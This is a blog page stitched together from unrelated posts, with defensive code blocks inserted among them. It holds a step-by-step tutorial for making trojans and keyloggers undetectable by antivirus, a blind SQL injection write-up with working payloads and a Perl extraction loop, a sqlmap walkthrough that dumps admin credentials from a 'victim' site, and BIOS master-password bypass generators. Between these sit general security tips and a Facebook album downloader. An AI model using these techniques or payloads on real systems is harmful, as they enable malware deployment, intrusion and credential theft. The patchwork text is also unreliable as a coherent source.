
Monday, February 26, 2018

Create your own FUD trojan Stub

So, some crypters and viruses are now detected as hacktools by antiviruses and are of no use any more. Bunn has created Fly Crypter, which has a unique stub generator. So, you can create your own stub, and your crypter becomes your own private version of the crypter, because you can assign and use new stubs with viruses and thus help your virus program remain FUD.

How to make Virus undetectable:

Usually, viruses are detected because their stubs are detected as viruses by AVs. So, if you change the stub of a virus, most of the time it becomes undetectable to antiviruses. So, I am explaining how to create your own stub and how to use this self-created stub to make your virus FUD (Fully UnDetectable) to antiviruses. This crypter was tested by me and found to work well on Windows XP and Windows Vista.

1. Free Download Fly Crypter + Unique Stub Generator software.


2. Run AUSG.exe file on your computer to see:
Make virus trojan FUD

3. Select "Str. Encr." and "Stub Encryption" options as I have selected above. Now, hit on "Generate my Stub". Allow some time for AUSG.exe to generate stub for you. After sometime, you'll get a confirmation message.

4. Now, hit on "Compile my stub" and you'll again get message like this:
Compile stub

Note: If you get error messages over here, repeat from Step 2 using "Random Passwords length" value less than 5.

5. Now, move on to directory containing Fly Crypter and AUSG.exe file. You will now see around 4 or 5 random string newly created files. One of those files is your newly created FUD Stub. Let this be "XlbAtKQ.exe".

6. Now, open Fly Crypter.exe. Create Apocalypse server and simply drag and drop this server on Fly Crypter.



7. Right click on server.exe, select Main Options -> Custom Stub and new popup box will be displayed.
How to make your own stub

Now, browse to your newly created stub "XlbAtKQ.exe" and hit OK. Select any password level and hit OK.

8. Again Right Click -> Crypt files and enter the name and path where you wanna save the newly created crypted virus file.

9. Now you have your crypted file ready to hack passwords and access a PC remotely for you. Go to novirusthanks.org and scan your stub and crypted file. You will find the detection rate decreased significantly.

Note 1: For AUSG.exe to compile your stub, you should have Microsoft Visual basic 6 installed on your computer.

Note 2: If you aren't getting FUD stub, just select the antiviruses you wanna bypass. Now, create stubs and start scanning them at novirusthanks.org. This method is used to collect and group stubs undetectable by specific antiviruses. Here is one stub which is not detected by most famous AVs as today's scanner results indicate:
- Avira
- AVG
- Avast
- Bit Defender
- Kaspersky
- Quick Heal
- Panda

Free Download this Stub over
Password: techotips.blogspot.com

Update: This method is not working 100%. Some readers have reported that it does not work with many keyloggers such as Ardamax keylogger, General keylogger and so on. (Thanks George, Riya and Central2000 for your valuable feedback.) So friends, try this out with your server to see whether it works, and please mention your feedback. If this is not working for you, try out crypter software.

Develop your own stubs. Now it is all up to you to make your trojans and viruses undetectable, since you are now able to develop your own stubs.

So friends, I hope this tutorial on how to make your own stubs to make your virus trojan undetectable by antiviruses will be helpful to you. If you have any problem in using Fly Crypter and AUSG.exe files to make your own stubs, please mention it in comments.

Enjoy and make your trojans undetectable...

8 Keys to Internet Security

Much more important than which antivirus program you use (or anti-spyware, or firewall, or any security software), or even whether you use one at all, are the practices that make up your online behavior. People who do risky stuff on the Internet will get a virus, sooner or later, regardless of how good their security software is. On the other hand, many security experts don’t use any antivirus software and still manage to avoid viruses.
I don’t recommend that you follow in the footsteps of the security experts – the nature of their calling demands a kind of paranoia that few of us can maintain. I recommend a solid package of security software (I run Cloud Antivirus and Windows Defender) but only as a safety net – something to pick up the slack when we make mistakes, not a first line of defense.
The thing with security, online or anywhere else, is that it’s always a trade-off between protection and convenience. I can tell you how to absolutely avoid any risk of computer virus, spyware, or trojan: stay offline and never install anything or use any removable storage media. That’s 100% perfect protection, but it would severely hinder your computer usage. It’s like securing a house: You could build a door-less, window-less titanium-sheathed reinforced-concrete bunker around your house and be absolutely sure burglars couldn’t get in, but you probably wouldn’t want to live there.
The tips below are sufficient to account for all but the most determined attacks against your computer. No amount of software or behavioral change can protect you from every possible attack (if the NSA wants to get on your PC, they are probably going to do so) but you can protect yourself from virtually all of the attacks you’re likely to face online.
I owe thanks for most of these tips to Leo Laporte and Steve Gibson, hosts of the TWiT netcast Security Now. If you’re interested in computer security at a very deep level, this weekly show is your ticket, and I heartily recommend it!

1. Use a router.

The very nature of the way routers work acts as an effective hardware firewall, preventing access to computers on your home network from outside the network. Put simply, when you request something from the Internet – say, you click a link, check your email, or enter a URL – the router notes which computer on its network the request came from so it can send the reply to the proper recipient. If a would-be intruder attempts to enter your network, the router checks its list of outgoing requests and, if none is found correlating to the attacker’s IP address, it ignores it. It basically doesn’t know which computer to send it to, so it throws it out.
If you simply cannot use a hardware router, make sure your operating system’s firewall is turned on. This is almost, but not entirely, as good.
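The behaviour described above, as an added example that is not part of the original post: a toy model of a router's translation table in which outbound requests are recorded and an inbound packet is delivered only when it matches a recorded request. Addresses, port numbers and the packets themselves are constructed for illustration.

```python
"""Toy model of the stateful behaviour the post attributes to home routers.
Outbound requests are recorded in a translation table keyed by the public
port and the remote endpoint; an inbound packet is delivered to the LAN host
that asked for it, and dropped when nothing in the table matches.
Names, addresses and packets are constructed."""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str = "tcp"


class HomeRouter:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self._next_port = first_port
        # (proto, public_port, remote_ip, remote_port) -> (lan_ip, lan_port)
        self.table = {}
        # reverse index so repeated requests from the same LAN socket reuse a mapping
        self._by_lan = {}
        self.dropped = []

    def outbound(self, pkt: Packet) -> Packet:
        """A LAN host sends a request: remember who asked, rewrite the source to the public address."""
        lan_key = (pkt.proto, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port)
        public_port = self._by_lan.get(lan_key)
        if public_port is None:
            public_port = self._next_port
            self._next_port += 1
            self._by_lan[lan_key] = public_port
            self.table[(pkt.proto, public_port, pkt.dst_ip, pkt.dst_port)] = (pkt.src_ip, pkt.src_port)
        return Packet(self.public_ip, public_port, pkt.dst_ip, pkt.dst_port, pkt.proto)

    def inbound(self, pkt: Packet) -> Optional[Packet]:
        """A packet arrives from the Internet: forward only if it answers a recorded request."""
        match = self.table.get((pkt.proto, pkt.dst_port, pkt.src_ip, pkt.src_port))
        if match is None:
            self.dropped.append(pkt)  # unsolicited: there is no LAN host to hand it to
            return None
        lan_ip, lan_port = match
        return Packet(pkt.src_ip, pkt.src_port, lan_ip, lan_port, pkt.proto)


def demo():
    """Constructed scenario: one legitimate web fetch, then an unsolicited probe."""
    router = HomeRouter("203.0.113.7")
    laptop = Packet("192.168.1.10", 51234, "198.51.100.20", 443)
    on_wire = router.outbound(laptop)
    reply = router.inbound(Packet("198.51.100.20", 443, "203.0.113.7", on_wire.src_port))
    # same public port, but from a remote host that nobody on the LAN talked to
    probe = router.inbound(Packet("192.0.2.99", 6000, "203.0.113.7", on_wire.src_port))
    return on_wire, reply, probe, len(router.dropped)


if __name__ == "__main__":
    print(demo())
```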

2. Do not open email attachments.

I know, who doesn’t want to see pictures of Anna Kournikova naked, right? Email attachments are a major vector for infecting computers, because it’s so easy to fake the sender so the email looks like it came from someone you know, and everybody loves opening attachments from people they know. It could be a funny picture of penguins, after all. But bottom line, don’t open attachments. If your email client automatically opens or previews them, turn that feature off. Even if it’s from your mom, and even if your mom says she opened it and it’s fine, still don’t open it. (By the way, next time you’re at mom’s, reinstall Windows. She’s got tons of viruses now.)
Now, I know that sometimes you have to open attachments, so here’s a simple test to know when it is most likely safe to open an attachment:
  1. You know that the email is from the person it says it’s from. That usually means that either they said they were sending it, or they’ve written a note that only they could have written.
  2. You are expecting an attachment from that person.
  3. You know the person who created the file.
  4. There is a compelling reason to open the attachment. I’m sorry, ma, but a good laugh isn’t enough to get me to risk my computer’s security.
If you can’t be absolutely, 100% sure on all these counts, trash it. 

3. Do not download bittorrent files.

That sucks, I know, but since you’re never absolutely sure where the file comes from, where it’s been, or who might have altered it, bittorrent is risky. Downloading a Linux distribution from Ubuntu is probably ok; downloading it from Pirate’s Bay is a bit dodgy. Downloading Oscar screeners of movies that haven’t been released yet is super-duper dodgy. It’s a real shame to have to forego sticking it to The Man because of practical concerns, but you’re taking a big risk downloading an unknown file from an unknown person about whom the only thing you know is that they don’t feel any compunctions about breaking the law. 

4. Do not download warez, porn, or other dubious files.

First they came for my bittorrents, then they came for my porn! It just gets worse and worse, doesn’t it. But really, think about it – people who distribute illegal copies of illegally hacked software a) are demonstrated lawbreakers, b) are familiar with programming code, and c) had access to the code you’re expecting to install on your computer. As for porn, while I’m sure there are plenty of Good Samaritans out there who distribute free pornography simply out of a desire for greater happiness in the world, some small number of them do it for financial gain. If they’re giving you free porn, they must be making money off you another way, and one of the easiest is to install a bunch of malware on your computer, run whatever code they want on it, and then sell the use of your computer to spammers, phishers, and other unsavory sorts. You want to know how bad these guys are? They don’t even care if they give pornography a bad name!

5. Do not download *anything* from sites you’re unfamiliar with.

Again, if you’re intending to install something you’ve downloaded onto your computer, you have to know that only people you trust have had access to it. Adobe, Microsoft, and other software manufacturers are generally trustworthy, as are sites like C|net’s Download.com. “Bob’s Free Software I Like a Whole Bunch” might not be quite as safe a bet.

6. Turn off Flash, Javascript, and other browser plugins.

Flash ads have been used to install viruses. So has Javascript code. You don’t have to do anything to get infected this way; you just visit a site with the malicious code on it and *bam*, you’re infected. Because of that, hardcore security folks turn off Javascript and either block or never install Flash. Personally, I think it limits the usefulness of the Internet too much; I’ve decided to risk running Javascript, and use the FlashBlock plugin in Firefox so I can select which Flash objects on a page I want to run (allowing me, for instance, to watch YouTube videos while preventing Flash ads on the same page from loading).

7. Do not click links in email.

It’s very easy to hide the real destination of links sent in email by using HTML where the text reads “www.perfectlysafesiteyouknowandtrust.com” but the actual URL is “www.reallybadsiterunbymeanpeoplewithnofriends.net”. This is how phishing scams work – you think you’re going to PayPal or your bank, but really you’re going to a page designed to look just like your bank’s login page but hosted on the mean people’s server. Also, bad guys often put unique tracking IDs into links, so that they know exactly who clicked on a link – which means that they know which email addresses out of the millions they sent spam to are valid, which makes them worth more money to other spammers. Um, yay?

7a. Do not click shortened URLs.

I don’t like this one, because I like Twitter and you lose a lot of functionality if you don’t use a service like bit.ly or is.gd to shorten URLs, but these links are scary. When you hover your mouse over a link, the URL appears in the email or browser’s status bar, meaning you can verify that the link heads to where it says it does. When you do the same with a shortened URL, it just says the shortened URL. There are Firefox extensions like UnTiny that will reveal the true destination of shortened URLs, and some Twitter clients do as well, but until a universal solution is standardized, these URLs remain a bit scary, security-wise.
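As an added example covering tips 7 and 7a (not code from the original post): a small checker for HTML e-mail that flags a link whose visible text names one site while its href points at another, a per-recipient tracking token in the query string, and a link that goes through a URL shortener so the real destination cannot be read from the status bar. The sample message and the list of tracking parameter names are constructed assumptions.

```python
"""Flag suspicious links in an HTML e-mail: display-text/href host mismatch,
per-recipient tracking tokens, and shortened URLs.  The message below and the
TRACKING_KEYS list are constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

SHORTENERS = {"bit.ly", "is.gd"}  # the two services named in the post
TRACKING_KEYS = {"uid", "rid", "u", "e", "track", "email"}  # assumed common names
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


class _Links(HTMLParser):
    """Collect (href, visible text) for every <a> element in the message."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _norm(host):
    host = (host or "").lower()
    return host[4:] if host.startswith("www.") else host


def analyze_links(html):
    """Return a list of (kind, detail, detail) findings, one per problem found."""
    parser = _Links()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        parts = urlparse(href)
        real = _norm(parts.hostname)
        shown = HOST_RE.search(text)
        shown = _norm(shown.group(1)) if shown else ""
        if shown and real and shown != real:
            findings.append(("mismatch", shown, real))  # text says one site, link goes to another
        if real in SHORTENERS:
            findings.append(("shortened", real, href))  # destination hidden behind a shortener
        for key, values in parse_qs(parts.query).items():
            if key.lower() in TRACKING_KEYS or any(len(v) >= 16 and v.isalnum() for v in values):
                findings.append(("tracking", key, href))  # opaque per-recipient token
                break
    return findings


# constructed sample message
SAMPLE_EMAIL = """<p>Please confirm your account at
<a href="http://www.reallybadsiterunbymeanpeoplewithnofriends.net/login?rid=7f3a9c1e2b4d6e8f">www.perfectlysafesiteyouknowandtrust.com</a>.
Photos from the party: <a href="http://bit.ly/2abcXYZ">click here</a>.
Help pages: <a href="https://www.perfectlysafesiteyouknowandtrust.com/help">www.perfectlysafesiteyouknowandtrust.com/help</a>.</p>"""

if __name__ == "__main__":
    for finding in analyze_links(SAMPLE_EMAIL):
        print(finding)
```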

8. Install all security updates.

Unless you’re a multi-national mega-corporation running oodles of mission-critical custom-designed software, you need to install security updates as quickly as possible upon release. If remembering to do this isn’t something you think you’d be likely to do, set your computer to automatically download and install updates. Increasingly, we’re seeing “0-day” exploits – viruses and trojans written to make use of security flaws before those flaws are corrected by – or, in some cases, even known to – manufacturers. Keeping up-to-date is essential to keep even marginally safe.
I know that, the world being what it is, someone will be thinking right about now, “Hey, why don’t you just switch to Mac OS X or Linux?” It’s true, those operating systems get far fewer viruses and other problems than Windows PCs, but most experts seem to agree that this is at least in part because there are so many Windows PCs and so few Mac and Linux PCs. (There are plenty of Linux servers, but those are under professional supervision, which goes a long way towards making up for any security weaknesses Linux has.) Bad guys program for the system that allows the greatest spread of their malware, and right now, that’s Windows.
But if you’re still not convinced, I’ve got an even better idea for you. Both Mac OS X and Linux have demonstrated security vulnerabilities, and as they become more common are likely to become targets for hackers. So they’re not really safe bets. Instead, try BeOS! It may be riddled with security holes and only run on Pentium 4 and earlier PCs, but I can guarantee you, nobody is writing viruses for it!
For everyone else, whether you use Windows, Mac, or Linux, make sure to follow the rules above and, chances are, you’ll be just fine.

Time Based Blind SQL Injection

Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string '''.
Then, without parsing the above error response any further, I started inserting the common exploitation strings:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc
The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:

Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.
This was telling me two things: first, my SQLi was being executed, but with syntax errors; and second, I was not in the common scenario where the injection lands after the WHERE clause:

select ..... where user='aa' OR 1=1
After a lot of testing without success, I just assumed I could not inject any SQL command after the single quote, so I started inserting other chars like ',' and... I got the error below:

Procedure or function get_Etiqueta has too many arguments specified.
Then I realized we were dealing with a stored procedure which was in fact injectable; this could explain the restrictions and therefore the syntax error messages. So I decided on a new way of injecting (below is the value inserted in the vulnerable POST parameter):

';<my_own_sql_query>;--
The injection above says: complete the current request, execute my own SQL command, and comment out the rest of the string.

When executed using a fake table and field:

'; select xxx from table tabla'--
I did not get any error, just a redirect back to the main Login page. Then I realized we were not getting any responses from the DB and were therefore in a Blind SQL Injection scenario, so I decided to use the well-known WAITFOR DELAY command from MSSQL to validate whether my attempts were being executed on the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'
And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.
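From the defender's side, as an added example that is not part of the original post: a detection pass over web server request logs for the time-based blind injection just described. Each parameter value is URL-decoded and its whitespace collapsed before matching, so the TAB (%09) trick that got past the application's space filter does not also get past the detector, and the logged response time is compared with the delay the payload asked for. The log format, field names and log lines are constructed.

```python
"""Detect time-based blind SQL injection attempts in request logs.
Log format, field names and sample lines are constructed for illustration."""
import re
from urllib.parse import unquote_plus

# Delay primitives of the common engines; MSSQL's WAITFOR DELAY is the one in the post.
DELAY_RE = re.compile(
    r"waitfor\s+delay\s*'?(\d+):(\d+):(\d+)|\bsleep\s*\(\s*(\d+)|pg_sleep\s*\(\s*(\d+)|benchmark\s*\(",
    re.I,
)
STACKED_RE = re.compile(r"'\s*;")  # closing quote followed by a statement separator
# constructed format: date time client method path query-or-body status time-taken-ms
LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<method>\S+) (?P<path>\S+) "
    r"(?P<params>\S+) (?P<status>\d+) (?P<ms>\d+)$"
)


def normalize(raw: str) -> str:
    """Decode twice (catches double encoding) and fold every whitespace run, TABs included, to one space."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw)))


def requested_delay_s(norm: str):
    """Seconds of delay a matched payload asks for, or None if no delay primitive is present."""
    m = DELAY_RE.search(norm)
    if not m:
        return None
    h, mi, s, sleep_s, pg_s = m.groups()
    if h is not None:
        return int(h) * 3600 + int(mi) * 60 + int(s)
    return int(sleep_s or pg_s or 0)


def inspect(raw: str) -> dict:
    norm = normalize(raw)
    return {
        "delay_s": requested_delay_s(norm),
        "stacked": bool(STACKED_RE.search(norm)),
        "tab_spacing": "\t" in unquote_plus(raw),
        "decoded": norm,
    }


def scan_log(lines):
    """Return one finding per parameter value that carries a delay payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        for pair in m["params"].split("&"):
            name, _, raw = pair.partition("=")
            v = inspect(raw)
            if v["delay_s"] is None:
                continue
            reasons = ["delay_primitive"]
            if v["stacked"]:
                reasons.append("stacked_query")
            if v["tab_spacing"]:
                reasons.append("tab_as_space")
            if int(m["ms"]) >= v["delay_s"] * 1000:
                reasons.append("response_time_matches_delay")  # the delay really executed
            findings.append({"ts": m["ts"], "client": m["client"], "param": name,
                             "reasons": reasons, "decoded": v["decoded"]})
    return findings


# constructed sample log: one normal login, two timing probes, one unrelated request
SAMPLE_LOG = """\
2010-03-01 10:15:02 10.0.0.5 POST /login.asp user=admin&pass=secret 302 41
2010-03-01 10:15:09 198.51.100.23 POST /login.asp user=0%27%3BWAITFOR%09DELAY%09%270%3A0%3A15%27&pass=x 302 15203
2010-03-01 10:15:31 198.51.100.23 POST /login.asp user=0%27%3Bwaitfor%09delay%09%270%3A0%3A10%27%3B--&pass=x 302 10071
2010-03-01 10:16:00 10.0.0.9 GET /news.asp id=4%20or%201%3D1 200 12
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
```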

Exploit from Scratch.

I tried to use sqlmap or sqlninja to dump the database or to get a remote shell, but neither worked for me, for one reason: those tools have their own methods to bypass filters, but unfortunately the TAB (%09) trick is not handled by them, and therefore all my injections were being rejected. Adjusting those tools was a mess, so I decided to keep improving my own tools and came up with the Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:
  • Creates a SQL procedure to assign the SQL query result to a variable.
  • Iterates over each char of the result and compares it with the ASCII table to identify its value; if the value matches, the response is delayed by 10 seconds, which is how the tool knows a char was identified.
  • Writes output to a log file.
  • Implements the netcat upload feature from the sqlninja tool, changing only the bypass technique and the libraries used to establish the SSL connection.
Below the script to identify the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At Line 2, the char at position $j is extracted from the acquired string and compared with a value from the ASCII table ($i).
This loop repeats until the char is found, and then $j is incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

# Helpers used below are part of the author's script but are not shown on this page:
#   send_request($payload) sends the HTTPS request carrying the injected SQL;
#   check_time() times the response and returns "encontrado" ("found") when the
#   10-second delay was observed. $sql, $prefix, $postfix, $tb and $fi are set earlier.
open(FILE, ">>", "output.txt") or die $!;   # log file
my $r;
$dato = " ";   # non-empty seed so the first pass runs; cleared at the top of each pass

while (length($dato) > 0) {   # keep searching until no more data is found
    $dato = "";
    for $j (1 .. 100) {   # maximum text length to retrieve, although the tool notices earlier when the string is complete
        print "\t\nIdentifying char number: $j\n";
        $r = "";
        for $i (32 .. 126) {   # printable ASCII chars only
            $g = $i;   # candidate char, presumably recorded into $dato by check_time() (not shown)
            print "\t\nValidating if the letter exists: " . chr($i) . "\n";
            my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
                      " if (ascii(substring(\@s,$j,1))) =" . $i . " waitfor delay '0:0:10' " .
                      " else waitfor delay '0:0:1'";

            send_request($prefix . $cmd . $postfix);   # send HTTPS request
            $r = check_time();   # a response delayed by ~10 s means the char was identified
            if ($r eq "encontrado") {
                last;
            }
        }

        if ($r eq "encontrado") {
            print "\t\nGetting content ... " . $dato . "\n";
            print FILE "Getting content ...: " . $dato . "\n";
        }
        else {   # no char matched; this may mean the end of the identified string
            print "\t\n*********END OF CONTENT EXTRACTION ... Moving to next one.\n";
            last;
        }
    }
    print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
    print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

    $sql = $sql . " and $fi not like '" . $dato . "'";   # prepare the next string to retrieve
}
close(FILE);
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tool is able to identify:
  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities; it assumes you have already found one and need to leverage the exploitation. That being said, you might need to change the $prefix and $postfix variables within the tool to adjust to the way your application is exploitable.


Download All Photos, Images Inside Facebook Albums Easily in Firefox

FacePAD, better known as the Facebook Photo Album Downloader, allows you to download entire Facebook albums, including your friends’ albums, with a click of a button. FacePAD is also compatible with all languages that Facebook supports.

SETUP/PREFERENCES
1) Make sure that THIRD PARTY COOKIES are ENABLED in Firefox’s Options/Preferences (under the Privacy tab).

DOWNLOADS ALBUMS (FRIEND’S, FAN PAGE)
(1) To download photos from a friend’s/fan page album, right-click (with your mouse) on the name/link of the Facebook album of interest and click the DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

DOWNLOADS ALBUMS (GROUP, EVENT)
(1) To download photos from the group/event album, click on the photo tab in said group/event. At the top, where it says SEE ALL PHOTOS, right-click (with your mouse) on this link and click the DOWNLOAD ALBUM WITH FACEPAD option.
(2) A window will pop-up asking you to choose a directory/folder where you would like the photos to be stored.
(3) The photos will then be downloaded and renamed in sequential, ascending order, where the order is determined by the age of the photo.

Hack website using Backtrack (sqlmap)

I am going to show you how to hack a website using Backtrack 5 (sqlmap). Sqlmap is an automatic SQL injection tool which helps you to hack websites easily. Follow these simple steps to hack a website using the Backtrack 5 sqlmap tool.

1. Open your Backtrack terminal, type cd /pentest/database/sqlmap and hit Enter. Now sqlmap is open in your terminal.
2. Now find the vulnerable site. (Well, I already have a vulnerable site.)
3. Now type this command in the terminal and hit Enter (refer to the figure above).
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 --dbs

4. Now you will get the database names of the website.
Well, I got the two databases aj and information_schema; we will select the aj database.

5. Now get the tables of that database. For that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) --tables

6. Now we need to grab the tables from the aj database. Paste the command below and hit Enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj --tables
7. Now you will get the list of tables stored in the aj database.
8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns, and we got username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website!
Now just find the admin panel of the website and use a proxy/VPN when you are trying to log in to the website as an admin.

BIOS Password Backdoors in Laptops

Synopsis: The mechanics of BIOS password locks present in current generation laptops are briefly outlined. Trivial mechanisms have been put in place by most vendors to bypass such passwords, rendering the protection void. A set of master password generators and hands-on instructions are given to disable BIOS passwords.

When a laptop is locked with a password, a checksum of that password is stored in a so-called FlashROM - this is a chip on the mainboard of the device which also contains the BIOS code and other settings, e.g. memory timings.

For most brands, this checksum is displayed after entering an invalid password for the third time:

The dramatic 'System Disabled' message is just scare tactics: when you remove all power from the laptop and reboot it, it will work just as before. From such a checksum (also called "hash"), valid passwords can be found by means of brute-forcing.

The bypass mechanisms of other vendors work by showing a number to the user from which a master password can be derived. This password is usually a sequence of numbers generated randomly.

Some vendors resort to storing the password in plain text onto the FlashROM, and instead of printing out just a checksum, an encrypted version of the password is shown.

Other vendors just derive the master password from the serial number. Either way, my scripts can be used to get valid passwords.

A few vendors have implemented obfuscation measures to hide the hash from the end user - for instance, some FSI laptops require you to enter three special passwords for the hash to show up (e.g. "3hqgo3 jqw534 0qww294e", "enable master password" shifted one up/left on the keyboard). Some HP/Compaq laptops only show the hash if the F2 or F12 key has been pressed prior to entering an invalid password for the last time.

Depending on the "format" of the number code/hash (e.g. whether only numbers or both numbers and letters are used, whether it contains dashes, etc.), you need to choose the right script - it is mostly just a matter of trying all of them and finding the one that fits your laptop. It does not matter on what machine the scripts are executed, i.e. there is no reason to run them on the locked laptop.
This is an overview of the algorithms that I looked at so far:

Vendor | Hash encoding | Example of hash code/serial | Scripts
Compaq | 5 decimal digits | 12345 | pwgen-5dec.py, Windows binary
Dell | serial number | 1234567-595B, 1234567-D35B, 1234567-2A7B | Windows binary & source
Fujitsu-Siemens | 5 decimal digits | 12345 | pwgen-5dec.py, Windows binary
Fujitsu-Siemens | 8 hexadecimal digits | DEADBEEF | pwgen-fsi-hex.py, Windows binary
Fujitsu-Siemens | 5x4 hexadecimal digits | AAAA-BBBB-CCCC-DEAD-BEEF | pwgen-fsi-hex.py, Windows binary
Fujitsu-Siemens | 5x4 decimal digits | 1234-4321-1234-4321-1234 | pwgen-fsi-5x4dec.py, Windows binary
Hewlett-Packard | 5 decimal digits | 12345 | pwgen-5dec.py, Windows binary
Hewlett-Packard/Compaq Netbooks | 10 characters | CNU1234ABC | pwgen-hpmini.py, Windows binary
Insyde H20 (generic) | 8 decimal digits | 03133610 | pwgen-insyde.py, Windows binary
Phoenix (generic) | 5 decimal digits | 12345 | pwgen-5dec.py, Windows binary
Sony | 7 digit serial number | 1234567 | pwgen-sony-serial.py, Windows binary
Samsung | 12 hexadecimal digits | 07088120410C0000 | pwgen-samsung.py, Windows binary


The .NET runtime libraries are required for running the Windows binary files (extension .exe). If the binary files (.exe) don't work out for you, install Python 2.6 (not 3.x) and run the .py script directly by double-clicking them. Make sure that you correctly read each letter (e.g. number '1' vs letter 'l').

Вячеслав Бачериков has also converted my scripts to JavaScript so you can calculate the passwords with your browser: http://bios-pw.org.ua/ (sources).

Please leave a comment below on what make/model the scripts work. Also, be aware that some vendors use different schemes for master passwords that require hardware to be reset - among them are e.g. IBM/Lenovo. If you find that your laptop does not display a hash or the scripts do not work for you for whatever reason, try to:
  • use a USB keyboard for entering the password for avoiding potential defects of the built-in keyboard,
  • run CmosPwd to remove the password if you can still boot the machine,
  • overwrite the BIOS using the emergency recovery procedures. Usually, the emergency flash code is activated by pressing a certain key combination while powering on the machine. You also need a specially prepared USB memory stick containing the BIOS binary. The details are very much dependent on your particular model. Also, be aware that this can potentially brick your device and should only be done as a last measure.
  • Some Dell service tags are missing the suffix - just try the passwords for all suffixes by adding -595B, -2AB7 and -D35B to your service tag.
  • The passwords for some HP laptops are breakable with this script.
  • Unlocking methods for some Toshiba laptops are described here.
  • Some older laptop models have service manuals that specify a location of a jumper / solder bridge that can be set for removing the password.

If none of the above methods work, please use the vendor support. Please understand that my motivation for reverse-engineering comes from a personal interest - I will not accept offers to look at the specifics of certain models.
